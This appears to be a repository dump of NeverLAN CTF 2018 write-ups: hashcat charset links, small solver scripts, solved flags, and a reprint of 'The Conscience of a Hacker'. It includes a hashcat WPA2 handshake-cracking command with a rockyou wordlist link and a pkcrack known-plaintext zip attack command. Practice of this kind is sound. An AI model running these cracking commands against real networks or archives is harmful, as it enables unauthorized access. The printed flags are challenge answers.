https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_ISO-8859-15-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_cp1252-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-1-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-15-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-16-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_ISO-8859-16-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/French/fr_cp1252-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_ISO-8859-1-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_ISO-8859-15-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/German/de_cp1252-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Greek/el_ISO-8859-7-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Greek/el_ISO-8859-7-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Greek/el_cp1253-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Greek/el_cp1253-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_ISO-8859-1-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_ISO-8859-15-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_cp1252-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Polish/pl_cp1250-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Polish/pl_cp1250-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_ISO-8859-1-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_ISO-8859-15-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_cp1252-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Russian/ru_ISO-8859-5-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Russian/ru_ISO-8859-5-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Russian/ru_cp1251-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Russian/ru_cp1251-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Slovak/sk_ISO-8859-2-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Slovak/sk_ISO-8859-2-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Slovak/sk_cp1250-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Slovak/sk_cp1250-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_ISO-8859-1-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_ISO-8859-15-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_cp1252-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_ISO-8859-5.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_ISO-8859-5.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_KOI8-R.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_KOI8-R.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_cp1251.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_cp1251.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_ISO-8859-1.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_ISO-8859-1.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_ISO-8859-15.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_ISO-8859-15.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_cp1252.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_cp1252.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_ISO-8859-1.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_ISO-8859-1.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_ISO-8859-15.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_ISO-8859-15.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_cp1252.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_cp1252.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_ISO-8859-1.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_ISO-8859-1.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_ISO-8859-15.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_ISO-8859-15.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_cp1252.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_cp1252.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_ISO-8859-1.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_ISO-8859-1.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_ISO-8859-15.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_ISO-8859-15.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_cp1252.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_cp1252.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/README.md:
--------------------------------------------------------------------------------
 1 | # The WIFI Network (200)
 2 | 
 3 | ~~~
 4 | Name: The WIFI Network
 5 | 
 6 | Author: bashninja
 7 | 
 8 | Description: So we're still trying to get into the Jedi Archives. Let's try cracking the WiFi. Here's a WPA2 Handshanke I picked up while near the building.
 9 | ~~~
10 | 
11 | cap to hccapx : https://hashcat.net/cap2hccapx/
12 | 
13 | rockyou.txt : http://www.mediafire.com/file/7d7nz2kku7urzor/rockyou.txt
14 | 
15 | ~~~
16 | > hashcat neverlan.hccapx -a 0 -m 2500 rockyou.txt
17 | ~~~
18 | 
19 | flag{obiwan17}


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/flag.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/neverlan.cap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/neverlan.cap


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/neverlan.hccapx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/neverlan.hccapx


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/README.md:
--------------------------------------------------------------------------------
1 | # Zip Attack (100)
2 | 
3 | ~~~
4 | ./pkcrack -C encrypted.zip -c "supersecretstuff/sw-iphone-wallpaper-first-order.jpg" -P known-file.zip -p "sw-iphone-wallpaper-first-order.jpg" -d de.zip -a
5 | ~~~


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/encrypted.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/encrypted.zip


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/known-file.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/known-file.zip


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/sw-iphone-wallpaper-first-order.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/sw-iphone-wallpaper-first-order.jpg


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/README.md:
--------------------------------------------------------------------------------
1 | # NeverLAN CTF - gazoku (4th)
2 | 
3 | ~~~
4 | My first team ctf solo play challenge :D
5 | ~~~
6 | 
7 | 
8 | Review (Korean) - [Here](http://blog.withphp.com/post/105)
9 | 


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Happy hunting.txt:
--------------------------------------------------------------------------------
1 | flag{packethackingvillage}


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Neo's-recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/Neo's-recon.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Purvesta's-recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/Purvesta's-recon.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Viking's-recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/Viking's-recon.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Zesty's-challenge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/Zesty's-challenge.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/s7a73farm's-recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/s7a73farm's-recon.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Reversing/Commitment-Issues/Commitmen-Issues(flag).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Reversing/Commitment-Issues/Commitmen-Issues(flag).png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Scripting/JSON-parsing-1/statistics.py:
--------------------------------------------------------------------------------
 1 | from re import findall
 2 | # made by munsiwoo
 3 | 
 4 | antivirusList = ['Bkav','K7AntiVirus','MicroWorld-eScan','nProtect','CMC','CAT-QuickHeal',
 5 | 'ALYac','Malwarebytes','Zillya','SUPERAntiSpyware','TheHacker','K7GW','CrowdStrike',
 6 | 'Arcabit','Invincea','Baidu','F-Prot','Symantec','TotalDefense','TrendMicro-HouseCall',
 7 | 'Avast','ClamAV','Kaspersky','BitDefender','NANO-Antivirus','Paloalto','ViRobot','Tencent',
 8 | 'Ad-Aware','Emsisoft','Comodo','F-Secure','DrWeb','VIPRE','TrendMicro','McAfee-GW-Edition',
 9 | 'Sophos','Ikarus','Cyren','Jiangmin','Webroot','Avira','Antiy-AVL','Kingsoft','Endgame',
10 | 'Microsoft','AegisLab','ZoneAlarm','Avast-Mobile','GData','AhnLab-V3','McAfee','AVware',
11 | 'MAX','VBA32','Cylance','WhiteArmor','Zoner','ESET-NOD32','Rising','Yandex','SentinelOne',
12 | 'eGambit','Fortinet','AVG','Panda','Qihoo-360', 'SymantecMobileInsight', 'Alibaba', 'Trustlook']
13 | 
14 | antivirus = []
15 | totalCount = []
16 | 
17 | file = open("file-20171020T1500", 'r')
18 | read = file.read()
19 | 
20 | find = findall("\"([a-zA-Z0-9-]+)\": {\"detected\": (true|false)", read)
21 | i = 0
22 | 
23 | for x in find :
24 | 	if(x[1] == 'true') :
25 | 		i += 1
26 | 		#print(str(i)+" : "+x[0])
27 | 		antivirus.append(x[0]) 
28 | 
29 | #print(i)
30 | #print(len(antivirus))
31 | 
32 | for y in antivirusList :
33 | 	count = antivirus.count(y)
34 | 	#antivirus = list(filter(lambda word: word != y, antivirus))
35 | 	print(y + " : " + str(count))
36 | 	totalCount.append(count)
37 | 
38 | totalCount.sort()
39 | 
40 | print(totalCount)
41 | #print(antivirus)
42 | 
43 | '''
44 | 
45 | ESET-NOD32,Ikarus,McAfee,CAT-QuickHeal,DrWeb
46 | ESET-NOD32,Ikarus,McAfee,CAT-QuickHeal,Fortinet
47 | 
48 | Why is not it auth???
49 | 
50 | '''


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Scripting/basic-math/sum.py:
--------------------------------------------------------------------------------
 1 | num = '''6255385361218216
 2 | 6157005081529331
 3 | 8094787234940670
 4 | 1979194212824551
 5 | 3930726164428768
 6 | 5191869878056791
 7 | 7528262998799463
 8 | 5345470866315424
 9 | 1647835474241505
10 | 3432404873925893'''
11 | 
12 | cal = num.replace("\n", "+")
13 | eval("print("+str(cal)+")")


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Scripting/even-more-basic-math-with-some-junk/sum.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | # made by munsiwoo
 3 | 
 4 | f = open('even_more_numbers_with_some_mild_inconveniences.txt', 'r')
 5 | result = 0
 6 | 
 7 | readall = f.read()
 8 | numlist = re.findall('\d+', readall)
 9 | 
10 | for x in range(0, len(numlist)) :
11 | 	result += int(numlist[x])
12 | 
13 | print(result)
14 | 


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Scripting/more-basic-math/sum.py:
--------------------------------------------------------------------------------
 1 | #made by munsiwoo
 2 | 
 3 | f = open('some_more_numbers.txt', 'r')
 4 | result = 0
 5 | 
 6 | for i in range(0, 10000) :
 7 | 	number = f.readline()
 8 | 	result += int(number)
 9 | 
10 | 
11 | print(result)


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/1.txt:
--------------------------------------------------------------------------------
 1 | The password to the zip is the handle of the author. 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 | =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 8 | The following was written shortly after my arrest...
 9 | 
10 |                        \/\The Conscience of a Hacker/\/
11 | 
12 |                                       
13 | 
14 |                            
15 | 
16 |                           Written on January 8, 1986
17 | =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
18 | 
19 |         Another one got caught today, it's all over the papers.  "Teenager
20 | Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
21 |         Damn kids.  They're all alike.
22 | 
23 |         But did you, in your three-piece psychology and 1950's technobrain,
24 | ever take a look behind the eyes of the hacker?  Did you ever wonder what
25 | made him tick, what forces shaped him, what may have molded him?
26 |         I am a hacker, enter my world...
27 |         Mine is a world that begins with school... I'm smarter than most of
28 | the other kids, this crap they teach us bores me...
29 |         Damn underachiever.  They're all alike.
30 | 
31 |         I'm in junior high or high school.  I've listened to teachers explain
32 | for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
33 | Smith, I didn't show my work.  I did it in my head..."
34 |         Damn kid.  Probably copied it.  They're all alike.
35 | 
36 |         I made a discovery today.  I found a computer.  Wait a second, this is
37 | cool.  It does what I want it to.  If it makes a mistake, it's because I
38 | screwed it up.  Not because it doesn't like me...
39 |                 Or feels threatened by me...
40 |                 Or thinks I'm a smart ass...
41 |                 Or doesn't like teaching and shouldn't be here...
42 |         Damn kid.  All he does is play games.  They're all alike.
43 | 
44 |         And then it happened... a door opened to a world... rushing through
45 | the phone line like heroin through an addict's veins, an electronic pulse is
46 | sent out, a refuge from the day-to-day incompetencies is sought... a board is
47 | found.
48 |         "This is it... this is where I belong..."
49 |         I know everyone here... even if I've never met them, never talked to
50 | them, may never hear from them again... I know you all...
51 |         Damn kid.  Tying up the phone line again.  They're all alike...
52 | 
53 |         You bet your ass we're all alike... we've been spoon-fed baby food at
54 | school when we hungered for steak... the bits of meat that you did let slip
55 | through were pre-chewed and tasteless.  We've been dominated by sadists, or
56 | ignored by the apathetic.  The few that had something to teach found us will-
57 | ing pupils, but those few are like drops of water in the desert.
58 | 
59 |         This is our world now... the world of the electron and the switch, the
60 | beauty of the baud.  We make use of a service already existing without paying
61 | for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
62 | you call us criminals.  We explore... and you call us criminals.  We seek
63 | after knowledge... and you call us criminals.  We exist without skin color,
64 | without nationality, without religious bias... and you call us criminals.
65 | You build atomic bombs, you wage wars, you murder, cheat, and lie to us
66 | and try to make us believe it's for our own good, yet we're the criminals.
67 | 
68 |         Yes, I am a criminal.  My crime is that of curiosity.  My crime is
69 | that of judging people by what they say and think, not what they look like.
70 | My crime is that of outsmarting you, something that you will never forgive me
71 | for.
72 | 
